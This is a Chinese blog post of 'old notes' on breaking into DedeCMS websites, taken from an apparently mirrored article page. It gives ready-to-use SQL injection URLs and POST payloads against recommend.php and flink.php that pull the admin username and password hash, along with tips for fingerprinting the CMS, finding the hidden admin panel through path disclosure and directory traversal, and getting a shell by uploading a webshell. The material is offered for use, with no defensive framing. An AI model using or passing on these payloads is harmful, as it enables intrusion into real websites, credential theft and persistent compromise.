美文网首页Web安全BIndustrial
关于织梦dedecms--以前的笔记

关于织梦dedecms--以前的笔记

作者: 简书这个地方快倒闭了 | 来源:发表于2017-03-29 15:45 被阅读160次

默认后台 /dede

判断技巧:

  1. / robots.txt

存在ad_js.php 的网站为dedecms典型系统。

首先看下
robots.txt 熟悉的
plus

  1. 御剑web指纹识别系统

漏洞利用:

漏洞一
:域名后面直接加一下代码:

/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=' or mid=@\' /!50000union//!50000select/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+%[23@__admin](mailto:23@__admin) limit+0,1),5,6,7,8,9%23@\'+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878

得到的md5去掉前三位和最后一位

返回信息:admin|94887d5b16df10b6 test0351

漏洞二

/plus/flink_add.php 获取验证码

在plus/flink.php页面post (提交前去掉_add)

查版本: (post data 注意验证码 ,firebug查询信息就可以查到版本信息)

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@',0x7c,(select version())),1,1,1,1,1)#,@'&typeid=1&url=http%3A%2F%2F&validate=验证码&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

关于织梦dedecms--以前的笔记 - 303Donatello - 303Donatello

===

===

===

查密码:

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@',0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@'&typeid=1&url=http%3A%2F%2F&validate=验证码&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

查账号密码使用方法与查询版本号相同

、、、、、、、、、、、、、、、、、、、、、、、、

、、、、、、、、、、、、、、、、、、、、、、、、

织梦dedecms查找后台的技
巧。

1、/include/dialog/select_media.php?f=form1.murl

织梦dedecms查找后台的技巧。

2、/include/dialog/select_soft.php

织梦dedecms查找后台的技巧。

3.使用mysql_error 信息去试试

/data/mysql_error_trace.inc —— 建议使用该方法屡试屡爽

织梦dedecms查找后台的技巧。

但不一定通杀。。

织梦dedecms查找后台的技巧。

/robots.txt

/data/admin/ver.txt

DedeCmsV5.1 FreeSP1访问

织梦dedecms查找后台的技巧。

http://127.0.0.1/include/dialog/ … =/include/FCKeditor

织梦dedecms查找后台的技巧。

可以跳转目录跳转到根目录的方法为:

织梦dedecms查找后台的技巧。

http://127.0.0.1/include/dialog/ … h=/././././././././

织梦dedecms查找后台的技巧。

而且DEDECMS在访问不存在的目录时会报错如访问

织梦dedecms查找后台的技巧。

http://127.0.0.1/include/dialog/ … t0pst0pst0pst0pst0p

织梦dedecms查找后台的技巧。

DedeCMS V5.3.1和最新的DedeCMS V5.5正式版,发现这两个版本已经进行了处理,而且只会列出目录和一些允许显示的文件,PHP是不能显示了,爆路径是一样通用的构造

织梦dedecms查找后台的技巧。

http://127.0.0.1/include/dialog/ … =/include/FCKeditor

后台拿shell

  1. iis6.0

直接上传小马菜刀连接 核心-附件管理-文件式管理器

相关文章

网友评论

    本文标题:关于织梦dedecms--以前的笔记

    本文链接:https://www.haomeiwen.com/subject/hkoeottx.html

    延伸阅读

    深度阅读

    • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

    栏目导航

    热点阅读

    Web安全

    BIndustrial

    关于我们|服务条款|联系我们|关于织梦dedecms--以前的笔记 |投稿指南|网站地图|RSS订阅|排版工具|手机版

    提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

    Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

    备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

    本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

    所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!